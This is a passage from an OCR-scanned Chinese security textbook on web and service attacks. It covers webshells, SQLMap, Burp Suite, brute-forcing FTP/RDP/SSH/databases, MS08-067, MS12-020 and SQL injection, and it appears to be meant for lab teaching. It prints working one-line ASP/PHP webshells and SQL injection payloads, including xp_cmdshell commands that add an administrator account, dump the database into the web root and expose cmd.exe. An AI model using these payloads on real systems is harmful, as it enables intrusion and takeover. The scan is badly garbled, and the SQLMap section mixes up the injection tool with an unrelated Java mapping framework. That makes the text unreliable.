数据 库 也 可 以 ,只 要 知道 二 %eval request("value")%% 二 这 个 文件 被 插入 到 哪 一 个 ASP 文 
件 里 面 就 可 以 了 ) 它 是 基于 B/S 结构 的 。 

常用 的 一 句 话 木 马 如 下 。 

ASP 一 句 话 木马 : «  execute(request("value")) $»; 


PHP 一 句 话 木马 : <?php @eval( $ POST[value]);?»; 
ASP. NET 一 句 话 木马 : <% @ Page Language = "Jscript" %>,< $ eval(Request. Item[ "value"]) %>。 


工具 的 详细 使 用 请 参阅 实验 36 。 
6.7.6 SQLMap 


SQLMap 是 一 款 用 来 检测 与 利用 SQL 注入 漏洞 的 免费 开源 工具 ,有 一 个 非常 好 的 特 
性 , 即 对 检测 与 利用 的 自动 化 处 理 ,如 数据 库 指纹 ,访问 底层 文件 系统 、 执 行 命令 。SQL 
Map 提供 了 一 个 简洁 的 框架 ,使 用 简单 的 XML 描述 文件 将 JavaBean,Map 实现 和 基本 数 
据 类 型 的 包装 类 (String,Integer 等 ) 映 射 成 JDBC 的 PreparedStatement。 以 下 流程 描述 了 
SQLMap 的 高 层 生命 周期 。 

将 一 个 对 象 作 为 参数 (对 象 可 以 是 JavaBean, Map 实现 和 基本 类 型 的 包装 类 ) ,参数 对 
象 将 为 SQL 修改 语句 和 查询 语句 设 定 参数 值 。 

(1) 执行 mapped statement。 这 是 SQLMap 最 重要 的 步骤 。SQLMap 框架 将 创建 一 
个 PreparedStatement 实例 ,用 参数 对 象 为 PreparedStatement 实例 设 定 参 数 , 执行 
PreparedStatement 并 从 ResultSet 中 创建 结果 对 象 。 

(2) 执行 SQL 的 更 新 数据 语句 时 ,返回 受 影 响 的 数据 行 数 。 执 行 查询 语句 时 ,将 返回 
一 个 结果 对 象 或 对 象 的 集合 。 和 参数 对 象 一 样 ,结果 对 象 可 以 是 JavaBean, Map 实现 和 基 
本 数据 类 型 的 包装 类 。SQLMap 工具 已 经 集成 在 Kali Linux 系统 中 ,其 详细 使 用 请 参阅 实 
验 29。 


6.7.7 Burp Suite 工具 


Burp Suite 是 用 于 攻击 Web 应 用 程序 的 集成 平台 。 它 包含 许多 工具 ,并 为 这 些 工具 设 
计 了 许多 接口 ,以 促进 加 快 攻击 应 用 程序 的 过 程 。 所 有 的 工具 都 共享 一 个 能 处 理 并 显示 
HTTP 消息 ,持久 性 ,认证 ,代理 ,日 志 , 警 报 的 强大 的 可 扩展 的 框架 。 

1. Burp Suite 的 8 个 工具 箱 

(D Proxy: 是 拦截 HTTP/S 的 代理 服务 器 ,作为 一 个 在 浏览 器 和 目标 应 用 程序 之 间 
的 中 间 人 ,允许 拦截 查看、 修改 在 两 个 方向 上 的 原始 数据 流 。 

(2) Spider; 是 应 用 智能 感应 的 网 络 怜 虫 , 它 能 完整 地 枚 举 应 用 程序 的 内 容 和 功能 。 

(3) Scanner[ 仅 限 专业 版 ]: 是 一 个 高 级 工具 ,执行 后 , 它 能 自动 发 现 Web 应 用 程序 的 
安全 漏洞 。 

(4) Intruder: 是 定制 的 高 度 可 配置 的 工具 ,对 Web 应 用 程序 进行 自动 化 攻击 ,如 枚 举 
标识 符 ,收集 有 用 的 数据 ,以 及 使 用 fuzzing 技术 探测 常规 漏洞 。 

(5) Repeater: 是 靠 手动 操作 来 补 发 单独 的 HTTP 请 求 , 并 分 析 应 用 程序 响应 的 工具 。 
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(6) Sequencer: 是 用 来 分 析 那 些 不 可 预知 的 应 用 程序 会 话 令 牌 和 重要 数据 项 的 随机 性 
的 工具 。 

(7) Decoder: 是 进行 手动 执行 或 对 应 用 程序 数据 者 智能 解码 编码 的 工具 。 

(8) Comparer; 是 实用 的 工具 ,通常 是 通过 一 些 相关 的 请 求 和 响应 得 到 两 项 数据 的 一 
个 可 视 化 的 “差异 ”。 

2. Burp Suite 的 使 用 

当 Burp Suite 运行 后 ,Burp Proxy 开启 默认 的 8080 端口 作为 本 地 代理 接口 。 通 过 设 
置 一 个 Web 浏览 器 使 用 其 代理 服务 器 ,所 有 的 网 站 流量 可 以 被 拦截 .查看 和 修改 。 默 认 情 
况 下 ,对 非 媒 体 资源 的 请 求 将 被 拦截 并 显示 (可 以 通过 Burp Proxy 选项 里 的 Options 选项 
修改 默认 值 )。 对 所 有 通过 Burp Proxy 网 站 流量 使 用 预 设 的 方案 进行 分 析 , 然 后 纳入 到 目 
标 站 点 地 图 中 ,来 勾勒 出 一 张 包含 访问 的 应 用 程序 的 内 容 和 功能 的 画面 。 在 Burp Suite 
专业 版 中 ,默认 情况 下 , Burp Scanner 是 被 动 地 分 析 所 有 的 请 求 来 确定 一 系列 的 安全 
漏洞 。 

在 开始 认真 工作 之 前 ,最 好 指定 工作 范围 。 最 简单 的 方法 就 是 浏览 访问 目标 应 用 程序 ， 
然后 找到 相关 主机 或 目录 的 站 点 地 图 ,并 使 用 上 下 菜单 添加 URL 路 径 范围 。 通 过 配置 的 
这 个 中 心 范围 ,能 以 任意 方式 控制 单个 Burp 工具 的 运行 。 

当 浏 览 目标 应 用 程序 时 ,可 以 手动 编辑 代理 截获 的 请 求 和 响应 ,或 者 把 拦截 完全 关闭 。 
在 拦截 关闭 后 ,每 一 个 请 求 、 响 应 和 内 容 的 历史 记录 仍 能 在 站 点 地 图 中 积累 下 来 。 

和 修改 代理 内 截获 的 消息 一 样 ,可 以 把 这 些 消息 发 送 到 其 他 Burp 工具 执行 一 些 操作 : 
可 以 把 请 求 发 送 到 Repeater, 手 动 微 调 这 些 对 应 用 程序 的 攻击 ,并 重新 发 送 多 次 的 单独 请 
求 ; 可 以 把 请 求 发 送 到 Intruer, 加 载 一 个 自 定义 的 自动 攻击 方案 ,确定 一 些 常规 漏洞 ， 如 果 
看 到 一 个 响应 ,包含 不 可 预知 内 容 的 会 话 令 牌 或 其 他 标识 符 , 可 以 把 它 发 送 到 Sequencer 来 
测试 它 的 随机 性 ; 当 请 求 或 响应 中 包含 不 透明 数据 时 ,可 以 把 它 发 送 到 Decoder 进行 智能 
解码 和 识别 一 些 隐藏 的 信息 ,可 使 用 一 些 engagement 工具 使 工作 更 快 更 有 效 ; 在 代理 历史 
记录 的 项 目 、 单 个 主机 、 站 点 地 图 里 目录 和 文件 或 者 请 求 响应 上 显示 可 以 使 用 工具 的 任意 地 
方 上 执行 以 上 任意 的 操作 ,可 以 通过 一 个 中 央 日 志 记 录 的 功能 ,来 记录 单个 工具 或 整个 套件 
发 出 的 请 求 和 响应 。 

这 些 工具 可 以 运行 在 一 个 单一 的 选项 卡 窗口 或 者 一 个 被 分 离 的 单个 窗口 中 。 所 有 的 工 
具 和 套件 的 配置 信息 可 选 为 通过 程序 持久 性 加 载 。 在 Burp Suite 专业 版 中 ,可 以 保存 整个 
组 件 工 具 的 设置 状态 ,在 下 次 加 载 过 来 恢复 工具 。Burp Suite 的 详细 使 用 请 参阅 实验 36.3: 
验 37。 


6.8 应 用 漏洞 攻击 


6.8.1 FTP 服务 暴力 破解 


FTP 是 一 种 文件 传输 协议 ,FTP 服务 默认 端口 为 21。 利 用 FTP 服务 器 可 以 在 本 地 主 
机 和 远程 主机 间 进 行文 件 传 输 。 当 FTP 没有 配置 好 安全 控制 ,如 对 登录 的 源 地 址 及 密码 尝 
试 次 数 做 限制 时 ,那么 就 会 存在 暴力 破解 的 可 能 。 通过 Metasploit 中 的 ftp_login 模块 对 
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FTP 进行 暴力 破解 最 终 获得 密码 ,具体 使 用 步骤 见 实验 22, 
6.8.2 远程 桌面 暴力 破解 


远程 桌面 协议 (Remote Desktop Protocol) 是 让 客户 端 连接 远程 服务 器 桌面 的 协议 。 
3389 端口 是 Windows 远程 桌面 服务 的 默认 端口 。 一 般 用 户 可 以 通过 管理 员 用 户 名 密码 访 
问 开 放 3389 端口 的 计算 机 的 远程 桌面 进行 管理 。 

如 果 目 标 主 机 开放 3389 端口 , 且 对 登录 远程 桌面 的 源 地 址 及 密码 尝试 次 数 没 有 限制 ， 
可 通过 暴力 破解 获取 密码 ,并 进一步 控制 对 方 主机 。 具 体 使 用 步骤 见 实 验 23。 


6.8.3 SSH 服务 暴力 破解 


SSH 为 Secure Shell 的 缩写 ,由 IETF 的 网 络 工作 小 组 (Network Working Group) 所 
制定 ; SSH 为 建立 在 应 用 层 和 传输 层 基 础 上 的 安全 协议 。SSH 专 为 远程 登录 会 话 和 其 他 
网 络 服务 提供 安全 性 的 协议 。 利 用 SSH 协议 可 以 有 效 防止 远程 管理 过 程 中 的 信息 泄漏 问 
题 。SSH 最 初 是 UNIX 系统 上 的 一 个 程序 ,后 来 又 迅速 扩展 到 其 他 操作 平台 。SSH 在 正 
确 使 用 时 可 弥补 网 络 中 的 漏洞 。SSH 客户 端 适用 于 多 种 平台 。 几 乎 所 有 UNIX 平台 -一 
包括 HP-UX, Linux, AIX, Solaris, Digital UNIX, \Irix, 以 及 其 他 平台 ,都 可 运行 SSH。 

SSH 提供 了 以 下 两 种 验证 方式 。 

1. 基于 密 钥 的 安全 验证 

需要 依靠 密 钥 ,也 就 是 必须 为 自己 创建 一 对 密 钥 , 并 把 公用 密 钥 放 在 需要 访问 的 服务 器 
上 。 如 果 要 连接 到 SSH 服务 器 上 ,客户 端 软件 就 会 向 服务 器 发 出 请 求 ,请 求 用 密 钥 进行 安 
全 验证 。 服 务 器 收 到 请 求 之 后 , 先 在 该 服务 器 上 主 目录 下 寻找 公用 密 钥 ,然后 把 它 和 发 送 
过 来 的 公用 密 钥 进 行 比较 。 如 果 两 个 密 钥 一 致 ,服务 器 就 用 公用 密 钥 加密 “* 质 询 并 把 它 
发 送 给 客户 端 软 件 。 客 户 端 软件 收 到 “质询 ?之 后 就 可 以 用 私人 密 钥 解密 再 把 它 发 送 给 
服务 器 。 

2. 基于 口令 的 安全 验证 

只 要 知道 自己 的 账号 和 口令 ,就 可 以 登录 到 远程 主机 。 所 有 传输 的 数据 都 会 被 加 密 , 但 
是 不 能 保证 正在 连接 的 服务 器 就 是 想 连 接 的 服务 器 。 可 能 会 有 其 他 服务 器 在 冒充 真正 的 服 
务 器 ,也 就 是 受到 “中 间 人 ”这 种 方式 的 攻击 。 同 时 ,如 果 服 务 器 没有 其 他 安全 限制 ,如 登录 
来 源 IP, 账 户 登录 错误 次 数 , 则 会 可 能 存在 被 暴力 破解 的 可 能 。 但 SSH 也 不 是 绝对 安全 
的 ,如 果 没 有 限制 登录 源 IP, 且 没有 设置 尝试 登录 次 数 ,也 会 被 破解 。 该 方法 存在 暴力 破解 
漏洞 ,具体 使 用 步骤 见 实验 24。 


6.8.4 MySQL 暴力 破解 


MySQL 是 一 个 关系 型 数据 库 管理 系统 ,是 目前 最 流行 的 关系 型 数据 库 管 理 系 统 。 
MySQL 是 一 种 关联 数据 库 管理 系统 ,关联 数据 库 将 数据 保存 在 不 同 的 表 中 ,而 不 是 将 所 有 
数据 放 在 一 个 大 仓库 内 ,这 样 就 增加 了 速度 并 提高 了 灵活 性 。MySQL 所 使 用 的 SQL 是 用 
于 访问 数据 库 的 最 常用 标准 化 语言 。 由 于 其 体积 小 、 速 度 快 , 总 体 拥有 成 本 低 , 尤 其 是 开放 
源码 这 一 特点 ,一般 中 小 型 网 站 的 开发 都 选择 MySQL 作为 网 站 数据 库 。 用 户 可 以 通过 输 
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人 用 户 名 和 密码 来 登录 数据 库 服 务 器 。 而 一 般 服务 器 不 会 对 用 户 名 和 密码 的 登录 尝试 做 限 
制 , 因 此 可 以 通过 多 次 尝试 密码 的 方式 对 MySQL 服务 器 进行 暴力 破解 。 一 旦 获取 了 数据 
库 密码 ,攻击 者 可 进一步 向 数据 库 执行 增 、 删 \ 改 、 查 等 危险 操作 ,另外 也 可 写 入 恶意 代码 ,并 
利用 SQL 语句 在 服务 器 上 建立 含有 恶意 代码 的 文件 , 随 之 可 能 建立 系统 账户 并 提升 权限 ， 
进一步 获取 对 服务 器 的 控制 。 具 体 使 用 步骤 见 实验 25。 


6.8.5 MS SQL 暴力 破解 


MS SQL 是 微软 的 SQL Server 数据 库 服 务 器 ,是 用 于 电子 商务 、 业 务 线 和 数据 仓库 解 
决 方案 的 数据 库 管 理 和 分 析 系 统 。 用 户 可 以 通过 输入 用 户 名 和 密码 来 登录 数据 库 服务 器 。 
而 一 般 服务 器 不 会 对 用 户 名 和 密码 的 登录 尝试 做 限制 ,因此 可 以 通过 多 次 尝试 密码 的 方式 
对 MS SQL 服务 器 进行 暴力 破解 。 目 前 最 新 版 本 为 12.0。 具 体 使 用 步骤 见 实验 26。 


6.9 缓冲 区 溢出 漏洞 攻击 


6.9.1 缓冲 区 溢出 攻击 原理 


缓冲 区 溢出 是 指 当 计算 机 向 缓冲 区 内 填充 数据 位 数 超过 了 缓冲 区 本 身 的 容量 时 ,溢出 
的 数据 覆盖 在 合法 数据 上 。 理 想 的 情况 是 : 程序 会 检查 数据 长 度 ,而 且 并 不 允许 输入 超过 
缓冲 区 长 度 的 字符 。 但 是 绝 大 多 数 程序 都 会 假设 数据 长 度 总 是 与 所 分 配 的 储存 空间 相 匹 
配 ,这 就 为 缓冲 区 溢出 埋 下 隐患 。 操 作 系 统 所 使 用 的 缓冲 区 ,又 被 称 为 “堆栈 ”, 在 各 个 操作 
进程 之 间 ,指令 会 被 临时 储存 在 “堆栈 "当中 ,“ 堆 栈 ” 也 会 出 现 缓冲 区 溢出 。 缓 冲 区 溢出 使 目 
标 系统 的 程序 被 修改 ,经 过 这 种 修改 的 结果 是 在 系统 上 产生 一 个 后 门 。 

通过 往 程 序 的 缓冲 区 写 超出 其 长 度 的 内 容 , 造 成 缓冲 区 的 溢出 ,从 而 破坏 程序 的 堆栈 ， 
使 程序 转 而 执行 其 他 指令 ,以 达到 攻击 的 目的 。 这 项 攻击 对 技术 要 求 比较 高 ,但 是 攻击 的 过 
程 却 非常 简单 。 造 成 缓冲 区 溢出 的 原因 是 程序 中 没有 仔细 检查 用 户 输入 的 参数 。 例 如 下 面 
的 程序 : 

void function(char * str) { 

char buffer[16]; strcpy(buffer, str); 

) 

strcpy() 将 直接 把 str 中 的 内 容 复制 到 buffer 中 。 这 样 只 要 str 的 长 度 大 于 16 ,就 会 造 
成 buffer 的 溢出 ,使 程序 运行 出 错 。 存 在 像 strcpy 这 样 的 问题 的 标准 函数 还 有 strcat()、 
sprintf() ,vsprintf() ,gets() ,scanf() 等 。 

缓冲 区 溢出 攻击 之 所 以 成 为 一 种 常见 安全 攻击 手段 ,其 原因 在 于 缓冲 区 溢出 漏洞 太 普 
遍 了 ,并 且 易 于 实现 。 而 且 , 缓 冲 区 溢出 成 为 远程 攻击 的 主要 手段 其 原因 在 于 缓冲 区 溢出 漏 
洞 给 予 了 攻击 者 他 所 想 要 的 一 切 : 植 入 并且 执 行 攻击 代码 。 被 植 入 的 攻击 代码 以 一 定 的 权 
限 运行 有 缓冲 区 溢出 漏洞 的 程序 ,从 而 得 到 被 攻击 主机 的 控制 权 。 


6.9.2 Windows 系统 漏洞 
Windows 系统 漏洞 是 指 Windows 操作 系统 本 身 所 存在 的 技术 缺陷 。 系 统 漏 洞 往往 会 
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被 病毒 利用 侵入 并 攻击 用 户 计算 机 。 系 统 漏 洞 这 里 特 指 Windows 操作 系统 在 逻辑 设计 上 
的 缺陷 或 在 编写 时 产生 的 错误 ,这 个 缺陷 或 错误 可 以 被 不 法 者 或 者 黑客 利用 ,通过 植 人 木 
马 、 病 毒 等 方式 来 攻击 或 控制 整个 计算 机 ,从 而 窃取 计算 机 中 的 重要 资料 和 信息 ,甚至 破坏 
系统 。 漏 洞 会 影响 到 的 范围 很 大 ,包括 系统 本 身 及 其 支撑 软件 ,网 络 客户 和 服务 器 软件 ,网 
络 路 由 器 和 安全 防火 墙 等 。 换 言 之 ,在 这 些 不 同 的 软 硬 件 设备 中 都 可 能 存在 不 同 的 安全 漏 
洞 问题 。 在 不 同 种 类 的 软 、 硬 件 设备 , 同 种 设备 的 不 同 版 本 之 间 , 巾 不 同 设备 构成 的 不 同系 
统 之 间 , 以 及 同 种 系统 在 不 同 的 设置 条 件 下 ,都 会 存在 各 自 不 同 的 安全 漏洞 问题 。Windows 
操作 系统 供应 商 将 定期 对 已 知 的 系统 漏洞 发 布 补丁 程序 ,用 户 只 要 定期 下 载 并 安装 补丁 程 
序 , 就 可 以 保证 计算 机 不 会 轻易 地 被 恶意 代码 入 侵 。 


6.9.3 Windows 系统 漏洞 MS08-067 


Windows 系统 远程 溢出 漏洞 MS08-067 几乎 影响 所 有 Windows 系统 ,并 且 很 快 成 为 黑 
客 攻击 和 木马 传播 利用 的 手段 , 受 此 漏洞 危害 的 用 户 系统 将 会 非常 多 。MS08-067 it fii 
出 漏洞 的 原因 是 由 于 Windows 系统 中 RPC 存在 缺陷 造成 的 , Windows 系统 的 Server 服务 
在 处 理 特制 RPC 请 求 时 存在 缓冲 区 溢出 漏洞 ,远程 攻击 者 可 以 通过 发 送 恶 意 的 RPC 请 求 
触发 这 个 溢出 ,如 果 受 影响 的 系统 收 到 了 特制 伪造 的 RPC 请 求 , 可 能 允许 远程 执行 代码 , 导 
致 完 全 入侵 用 户 系统 ,以 SYSTEM 权限 执行 任意 指令 并 获取 数据 ,同时 获取 对 该 系统 的 控 
制 权 ,造成 系统 失窃 及 系统 崩溃 等 严重 问题 。 

受 MS08-067 远程 溢出 漏洞 影响 的 系统 非常 多 , 受 影响 的 操作 系统 有 Windows XP/ 
2000/ Vista/2003/ Windows 7 等 。 除 Windows Server 2008 Core 外 ,基本 上 所 有 的 Windows 系 
统 都 会 遭受 此 漏洞 的 攻击 ,特别 是 在 Windows 2000, Windows XP 和 Windows Server 2003 
系统 上 ,攻击 者 可 以 利用 此 漏洞 无 须 通过 认证 运行 任意 代码 。 这 个 漏洞 还 可 能 被 蠕虫 利用 ， 
此 安全 漏洞 可 以 通过 恶意 构造 的 网 络 包 直接 发 起 攻击 ,并 且 攻 击 者 可 以 获取 完整 权限 ,因此 
该 漏洞 很 可 能 会 被 用 于 制作 蠕虫 以 进行 大 规模 的 攻击 。 这 个 漏洞 主要 是 针对 139.445 端口 
的 RPC 服务 进行 攻击 的 漏洞 。 具 体 使 用 步骤 见 实验 27. 


6.9.4 Windows 系统 漏洞 MS12-020 


MS12-020 Jy Windows 下 2012 年 爆 出 的 高 危 安 全 漏洞 ,该 漏洞 是 因为 Windows 系统 
的 远程 桌面 协议 (Remote Desktop Protocol, RDP) 存 在 缓冲 区 溢出 漏洞 ,攻击 者 可 通过 向 目 
标 操作 系统 发 送 特定 内 容 的 RDP 包 造 成 操作 系统 蓝屏 ,无 法 继续 提供 服务 ,利用 起 来 操作 
方便 ,危害 极 大 ,影响 范围 极 广 。 主 要 针对 3389 端口 ,更 为 严重 的 是 自 2012 年 漏洞 爆 出 后 
并 未 更 新 系统 补丁 。 具 体 使 用 步骤 见 实验 28。 


6.10 SQL iE AX ili 


所 谓 SQL 注入 ,就 是 通过 把 SQL 命令 插入 到 Web 表单 提交 或 输入 域名 或 页 面 请 求 的 
查询 字符 串 ,最 终 达 到 欺骗 服务 器 执行 恶意 的 SQL 命令 。 具 体 来 说 , 它 是 利用 现 有 应 用 程 
序 ,将 (恶意 的 )SQL 命令 注入 到 后 台数 据 库 引 擎 执行 的 能 力 , 它 可 以 通过 在 Web 表单 中 输 
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人 (恶意 )SQL 语句 得 到 一 个 存在 安全 漏洞 的 网 站 上 的 数据 库 , 而 不 是 按照 设计 者 意图 去 执 
行 SQL 语句。 比如 先前 的 很 多 影视 网 站 泄漏 VIP 会 员 密码 大 多 就 是 通过 Web 表单 递交 查 
询 字符 爆 出 的 ,这 类 表单 特别 容易 受到 SQL 注入 式 攻击 。 


6.10.1 基本 原理 


SQL 注入 攻击 指 的 是 通过 构建 特殊 的 输入 作为 参数 传人 Web 应 用 程序 ,而 这 些 输入 
大 都 是 SQL 语法 里 的 一 些 组 合 , 通 过 执行 SQL 语句 进而 执行 攻击 者 所 要 的 操作 ,其 主要 原 
因 是 程序 没有 细致 地 过 滤 用 户 输入 的 数据 ,致使 非法 数据 侵入 系统 。 

请 看 下 面 的 代码 。 


strSQL- "SELECT * FROM users WHERE (name= '" + userName + " ')and( pw = '" + passWord + " ');" 


恶意 填 人 : userName = " 'OR '1 '='1 " ; 5j passWord = " 'OR '1 '='1 " ;时 ,将 
导致 原本 SQL 字符 串 被 填 为 : 
strSQl- "SELECT * FROM users WHERE (name= '"OR'1'- '1')and(pw- '"OR'1'- '1');" 


也 就 是 实际 运行 的 SQL 会 变 成 下 面 这 样 : 
strSQL = ”SELECT * FROM users;" 


因此 达到 无 账号 密码 也 可 登录 网 站 的 目的 ,所 以 SQL 注入 攻击 被 俗称 为 黑客 的 天 空 
游戏 。 

根据 相关 技术 原理 ,SQL 注入 可 以 分 为 平台 层 注 入 和 代码 层 注 入 。 前 者 由 不 安全 的 数 
据 库 配 置 或 数据 库 平台 的 漏洞 所 致 ; 后 者 主要 是 由 于 程序 员 对 输入 未 进行 细致 的 过 滤 , 从 
而 执行 了 非法 的 数据 查询 。 基 于 此 ,SQL 注入 的 产生 原因 通常 表现 在 以 下 几 方 面 : 四 不 当 
的 类 型 处 理 ; @ 不 安全 的 数据 库 配 置 ; @@ 不 合理 的 查询 集 处 理 ; @ 不 当 的 错误 处 理 ; 回转 
义 字 符 处 理 不 合适 ; @ 多 个 提交 处 理 不 当 。 


6.10.2 注入 攻击 的 步骤 


1. SQL 注入 漏洞 的 判断 

一 般 来 说 ,SQL 注入 一 般 存 在 于 形 如 HTTP://xxx. xxx. xxx/abc. aspzid— XX 等 带 有 
参数 的 ASP 动态 网 页 中 ,有 时 一 个 动态 网 页 中 可 能 只 有 一 个 参数 ,有 时 可 能 有 NN 个 参数 ， 
有 时 是 整 型 参数 ,有 时 是 字符 串 型 参数 ,不 能 一 概 而 论 。 总 之 ,只 要 是 带 有 参数 的 动态 网 页 
且 此 网 页 访问 了 数据 库 ,那么 就 有 可 能 存在 SQL 注入 。 如 果 ASP 程序 员 没 有 安全 意识 ,不 
进行 必要 的 字符 过 滤 ,存在 SQL 注入 的 可 能 性 就 非常 大 。 

为 了 全 面 了 解 动态 网 页 回答 的 信息 ,首先 请 调整 IE 的 配置 。 把 IE 菜单 “工具 ”一 
"Internet 选项 ”>“ 高 级 ”>“ 显 示 友 好 HTTP 错误 信息 ”前 面 的 勾 去 掉 。 

为 了 把 问题 说 清楚 ,以 下 以 HTTP://xxx. xxx. xxx/abc. asp?p= YY 为 例 进行 分 析 ， 
YY 可 能 是 整 型 ,也 有 可 能 是 字符 串 。 

1) 整 型 参数 的 判断 

当 输 入 的 参数 YY 为 整 型 时 ,通常 abc. asp 中 SQL 语句 原貌 大 致 如 下 。 

select * from 表 名 where 字段 二 YY 
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所 以 可 以 用 以 下 步骤 测试 SQL 注入 是 否 存在 。 

(D HTTP://xxx. xxx. xxx/abc. asp?p 王 YY'( 附 加 一 个 单 引 号 ) ,此 时 abc. ASP 中 的 
SQL 语句 变 成 了 select * from 表 名 where 字段 二 YY',abc. asp 运行 异常 。 

(2) HTTP://xxx. xxx. xxx/abc. asp?p — YY and 1=1, abc. asp 运行 正常 ,而 且 与 
HTTP; //xxx. xxx. xxx/abc. asp?p— YY 运行 结果 相同 。 

(3) HTTP; //xxx. xxx. xxx/abc. asp?p— YY and 1—2, abc. asp 运行 异常 。 

如 果 以 上 三 步 全 满足 ,abc. asp 中 一 定 存在 SQL 注入 漏洞 。 

2) 字符 串 型 参数 的 判断 

当 输 入 的 参数 YY 为 字符 串 时 ,通常 abc. asp 中 SQL 语句 原貌 大 致 如 下 。 

select * from 表 名 where 字段 二 "YY', 所 以 可 以 用 以 下 步骤 测试 SQL 注入 是 否 存在 。 

(D HTTP://xxx. xxx. xxx/abc. asp?p 王 YY'( 附 加 一 个 单 引 号 ) ,此 时 abc. ASP 中 的 
SQL 语句 变 成 了 select * from 表 名 where 字段 二 YY',abc. asp 运行 异常 。 

(2) HTTP://xxx. xxx. xxx/abc. asp?p 一 YY&nb ... 39;1'— '1', abc. asp 运行 正常 ， 
而 且 与 HTTP: //xxx. xxx. xxx/abc. asp?p= YY 运行 结果 相同 。 

(3) HTTP://xxx. xxx. xxx/abc. asp?p= YY &-nb ... 39;1'— '2', abc. asp 运行 异常 。 

如 果 以 上 三 步 全 满足 ,abc. asp 中 一 定 存在 SQL 注入 漏洞 。 

3) 特殊 情况 的 处 理 

有 时 ASP 程序 员 会 在 程序 里 过 滤 掉 单 引号 等 字符 ,以 防止 SQL 注入 。 此 时 可 以 用 以 
下 几 种 方法 试 一 试 。 

(1) 大 小 写 混合 法 : 由 于 VBS 并 不 区 分 大 小 写 ,而 程序 员 在 过 滤 时 通常 要 么 全 部 过 滤 
大 写字 符 串 ,要 么 全 部 过 滤 小 写字 符 串 ,而 大 小 写 混合 往往 会 被 忽视 。 如 用 SelecT 代替 
select. SELECT 等 。 

(2) UNICODE 法 : 在 JS 中 ,以 UNICODE 字符 集 实现 国际 化 ,我 们 完全 可 以 将 在 TE 
中 输入 的 字符 串 转化 成 UNICODE 字符 串 进 行 输入 ,如 十 — 252B. s: — 2620 等 。 

(3) ASCI 码 法 : 可 以 把 输入 的 部 分 或 全 部 字符 全 部 用 ASCI 码 代 替 , 如 U = 
chr(85) ,a 二 chr(97) 等 。 

2. 分 析 数 据 库 服 务 器 类 型 

一 般 来 说 ,Access 与 SQL Server 是 最 常用 的 数据 库 服务 器 ,尽管 它们 都 支持 T-SQL 
标准 ,但 还 有 不 同 之 处 ,而 且 不 同 的 数据 库 有 不 同 的 攻击 方法 ,必须 要 区 别 对 待 。 

1) 利用 数据 库 服务 器 的 系统 变量 进行 区 分 

SQL Server 有 user. db. name OO 等 系统 变量 .利用 这 些 系统 值 不 仅 可 以 判断 SQL 
Server, 还 可 以 得 到 大 量 有 用 信息 ,如 : 

(D HTTP://xxx. xxx. xxx/abc. asp?p= YY and user 二 0 不 仅 可 以 判断 是 否 是 SQL 
Server, 还 可 以 得 到 当前 连接 到 数据 库 的 用 户 名 。 

(2) HTTP://xxx. xxx. xxx/abc. asp?p= YY &-n ... db nameO >0 不 仅 可 以 判断 是 否 
是 SQL Server, 还 可 以 得 到 当前 正在 使 用 的 数据 库 名 。 

2) 利用 系统 表 

Access 的 系统 表 是 msysobjects, 且 在 Web 环境 下 没有 访问 权限 ,而 SQL Server 的 系 
统 表 是 sysobjects, 在 Web 环境 下 有 访问 权限 。 对 于 以 下 两 条 语句 : 
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(1) HTTP://xxx. xxx. xxx/abc. asp?p= YY and (select count( * ) from sysobjects) —0 

(2) HTTP: //xxx. xxx. xxx/abc. asp?p— Y Y and (select count( * ) from msysobjects) >0 

若 数据 库 是 SQL Server, 则 第 一 条 ,abc. asp 一 定 运行 正常 ,第 二 条 则 异常 ; 若是 
Access 则 两 条 都 会 异常 。 

3) MS SQL 三 个 关键 系统 表 

sysdatabases 系统 表 : Microsoft SQL Server 上 的 每 个 数据 库 在 表 中 占 一 行 。 最 初 安 
装 SQL Server 时 ,sysdatabases 包含 master, model, msdb,mssqlweb 和 tempdb 数据 库 的 
项 。 该 表 只 存储 在 master 数据 库 中 。 这 个 表 中 保存 了 所 有 的 库 名 ,以 及 库 的 ID 和 一 些 相 
关 信息 。 

3. 确定 XP CMDSHELL 的 可 执行 情况 

车 当前 连接 数据 的 账号 具有 SA 权限 ,日 master. dbo. xp_cmdshell 扩展 存储 过 程 ( 调 用 
此 存储 过 程 可 以 直接 使 用 操作 系统 的 shell) 能 够 正确 执行 , 则 整个 计算 机 可 以 通过 以 下 几 
种 方法 完全 控制 ,以 后 的 所 有 步骤 都 可 以 省 略 。 

(D HTTP://xxx. xxx. xxx/abc. asp?p 一 YY&nb ... er 二 0 abc. asp 执行 异常 但 可 以 
得 到 当前 连接 数据 库 的 用 户 名 ( 若 显示 dbo 则 代表 SA). 

(2) HTTP://xxx. xxx. xxx/abc. asp?p— YY ... me() 二 0 abc. asp 执行 异常 但 可 以 得 
到 当前 连接 的 数据 库 名 。 

(3) HTTP://xxx. xxx. xxx/abc. asp?p= YY; exec master..xp_cmdshell "net user aaa 
bbb /add"-- (master 是 SQL Server 的 主 数据 库 ; 名 中 的 分 号 表示 SQL Server 执行 完 分 号 
前 的 请 句 名 ,继续 执行 其 后 面 的 语句 ;“--” 号 是 注解 ,表示 其 后 面 的 所 有 内 容 仅 为 注释 , 系 
统 并 不 执行 ) 可 以 直接 增加 操作 系统 账户 aaa ,密码 为 bbb。 

(4) HTTP;//xxx. xxx. xxx/abc. asp?p = YY; exec master.. xp _ cmdshell " net 
localgroup administrators aaa /add"-- 把 刚刚 增加 的 账户 aaa 加 到 administrators 组 中 。 

(5) HTTP://xxx. xxx. xxx/abc. asp?p 一 YY; backuup database 数据 库 名 to disk — " 
ci NinetpubVwwwrootNsave. db' 则 把 得 到 的 数据 内 容 全 部 备份 到 Web 目录 下 ,再 用 HTTP 
下 载 文件 (当然 首先 要 知道 Web 虚拟 目录 ) 。 

(6) 通过 复制 CMD 创建 UNICODE 漏洞 

HTTP://xxx. xxx. xxx/abc. asp?p = YY; exe... dbo. xp_cmdshell "copy c: \winnt\ 
system32Vemd. exe c:\inetpub\scripts\cmd. exe". 便 制造 了 一 个 UNICODE 漏洞 ,通过 此 
漏洞 的 利用 方法 , 便 完 成 了 对 整个 计算 机 的 控制 (当然 首先 要 知道 Web 虚拟 目录 ) 。 

4. 发 现 Web 虚拟 目录 

只 有 找到 Web 虚拟 目录 ,才能 确定 放置 ASP 木马 的 位 置 ,进而 得 到 USER 权限 。 有 两 
种 方法 比较 有 效 。 一 是 根据 经 验 猜 解 , 一 般 来 说 .Web 虚拟 目录 是 c:\inetpub\wwwroot; 
D:\inetpub\wwwroot; E:\inetpub\wwwroot 等 ,而 可 执行 虚拟 目录 是 c: VinetpubNscriptss 
